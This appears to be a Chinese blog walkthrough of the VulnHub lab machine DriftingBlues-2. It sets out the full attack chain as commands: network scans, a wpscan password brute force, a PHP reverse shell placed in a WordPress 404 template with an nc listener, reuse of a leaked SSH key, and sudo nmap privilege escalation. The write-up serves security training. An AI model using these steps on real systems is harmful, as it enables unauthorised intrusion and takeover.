靶机地址: https://www.vulnhub.com/entry/driftingblues-2,634/
1、主机探活
arp-scan -I eth0 -l (指定网卡扫)
masscan 192.168.184.0/24 -p 80,22
netdiscover -i eth0 -r 192.168.184.0/24
2、端口扫描
nmap -A -sV -T4 -p- 靶机ip
得到如下信息
21—ftp—ProFTPD–同时还有 anonymous 匿名登录
22—ssh—OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80—http—Apache httpd 2.4.38 ((Debian))
3、漏洞分析
①看到存在ftp匿名登录漏洞,进行尝试登录看看有没有好东西
ftp ip
输入anonymous,密码直接回车
ls
get secret.jpg (下载文件到当前路径)
或者直接更方便的用win查看
ftp://192.168.111.10/
看到图片就怀疑有没有存在隐写
binwalk secret.jpg
并没有存在图片隐写,查看图片发现是一张很普通的图片,到此未知ftp这条路断了线索,所以把暂时先把目光放到别的地方
②ssh一般只能暴力破解,暂时先放着
③80端口分析,访问只有图片,那就先扫一波端口
gobuster dir -u “http://192.168.111.10/” -w /root/tools/directory-list-2.3-medium.txt -x php,html,txt,zip
得到/blog目录,访问后发现是wordpress站点
随机点击里面的链接发现无法访问且发现了 driftingblues.box,猜测可能是得使用域名进行访问了
所以我们进行将其添加到hosts中,再次访问成功
4、再扫一次目录
dirsearch -u http://driftingblues.box/blog/
扫描出了wordpress的后台登录页面
5、既然是wordpress站点,那直接用上扫描器扫一下吧
wpscan --url http://driftingblues.box/blog -e u
发现一个用户albert,接着对该用户尝试密码的暴力破解
wpscan --url http://driftingblues.box/blog/ --passwords /usr/share/wordlists/rockyou.txt --usernames albert
#如果是第一次使用这个字典文件进行爆破的话,需要先对这个字典文件进行解压,因为它是一个压缩包
成功爆破出了密码为:scotland1
6、输入账号密码进入后台,先点击Appearance,再点击Theme Editor,最后点击404页面代码
直接写入反弹shell代码,给出链接
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
此时访问一个不存在的url,会进行跳转到404错误,就会触发我们的反弹shell代码,
首先kali先开启监听:nc -lvnp 1234
然后访问一个不存在的 URL: http://driftingblues.box/blog/index.php/1234
7、切换交互式shell
python3 -c ‘import pty; pty.spawn("/bin/bash")’
8、进入 home 发现用户 freddie ,并进入目录,发现 user.txt ,查看文件内容,无权限,所以要想办法提权
在freddie目录下发现一个ssh登陆的rsa
在本地创建一份id_rsa,将靶机中的id_rsa中的内容复制到本地,然后进行登陆
chmod 400 id_rsa #修改权限,rsa需要400权限才可用
ssh freddie@192.168.33.140 -i id_rsa #使用rsa进行登入
8、sudo提权
发现可以利用 nmap 提权 ,去 https: /gtfobins.github.io/ 查找 nmap
照着上面做就行
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
然后使用 python 切换 bash: python3 -c 'import pty; pty.spawn("/bin/bash")'
或者直接输入bash
完结散花~
参考:https://blog.csdn.net/liver100day/article/details/119060769
https://www.freebuf.com/articles/others-articles/279203.html
https://blog.csdn.net/qq_39991837/article/details/117515724
400
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
